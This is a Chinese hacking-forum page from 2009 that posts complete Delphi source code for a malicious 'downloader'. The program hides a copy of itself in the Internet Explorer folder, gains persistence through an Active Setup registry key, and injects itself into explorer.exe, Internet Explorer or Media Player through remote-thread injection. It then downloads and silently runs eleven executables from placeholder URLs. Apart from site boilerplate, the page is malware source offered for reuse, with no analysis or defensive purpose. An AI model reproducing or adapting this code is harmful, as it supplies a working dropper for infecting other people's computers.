为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

ActiveX启动下载者(delphi)

2009-6-17 10:58| 投稿: security

摘要: program InjectTheSelf; {$IMAGEBASE $13140000} usesWindows; var//动态加载shell32.dll中的ShellExecuteA函数S...
program InjectTheSelf; {$IMAGEBASE $13140000} usesWindows; var//动态加载shell32.dll中的ShellExecuteA函数ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;//动态加载Urlmon.dll中的UrlDownloadToFileA函数Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;hShell,hUrlmon: THandle; //插入IE需要用到的函数function GetIEAppPath:string;variekey: Hkey;iename: array [0..255] of char;vType,dLength :DWORD;beginvType := REG_SZ;RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);dLength := SizeOf(iename);if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 thenResult := ienameelseResult := '%programfiles%\Internet Explorer\IEXPLORE.EXE';RegCloseKey(iekey);end;//写注册表 用到的函数 为activeX启动准备function Skrivreg(key:Hkey; subkey,name,value:string):boolean;varregkey:hkey;beginresult := false;RegCreateKey(key,PChar(subkey),regkey);if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 thenresult := true;RegCloseKey(regkey); end; //插入media player用到的函数function GetwmAppPath:string;varwmkey: Hkey;iename: array [0..255] of char;vType,dLength :DWORD;begin vType := REG_SZ;RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);dLength := SizeOf(iename);if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 thenResult := ienameelseResult := '%programfiles%\Windows Media Player\wmplayer.EXE';RegCloseKey(wmkey);end; procedure Download; //下载过程beginLoadLibrary('kernel32.dll');LoadLibrary('user32.dll');hShell:=LoadLibrary('Shell32.dll');hUrlmon:=LoadLibrary('unlmon.dll');@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5); Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5); Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5); Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5); Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5); Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5); Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5); Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5); Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5); Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5); Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5); ExitProcess(0);end; procedure Inject(ProcessHandle: longword; EntryPoint: pointer);varModule, NewModule: Pointer;Size, BytesWritten, TID: longword;begin//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址Module := Pointer(GetModuleHandle(nil));//得到内存映像的长度Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;//在Exp进程的内存范围内分配一个足够长度的内存VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);//确定起始基址和内存映像基址的位置NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定上面各项数据后,这里开始进行操作WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);//建立远程线程,至此注入过程完成CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID); end; procedure RunInject(InjType:integer);varProcessHandle, PID: longword; beginif InjType=0 then //注入explorer.exebegin//获取Exp进程的PID码GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);endelseif InjType=3 then //注入 media playerbeginwinexec(PChar(GetwmAppPath),sw_hide);sleep(500);GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);endelse //注入iexplore.exebegin//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);winexec(PChar(GetIEAppPath),sw_hide);sleep(500);GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);end;//打开进程ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);Inject(ProcessHandle, @Download);//关闭对像CloseHandle(ProcessHandle);end; BEGIN CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//设置文件系统隐藏属性//activex自启动skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');RunInject(0); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media playerend.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部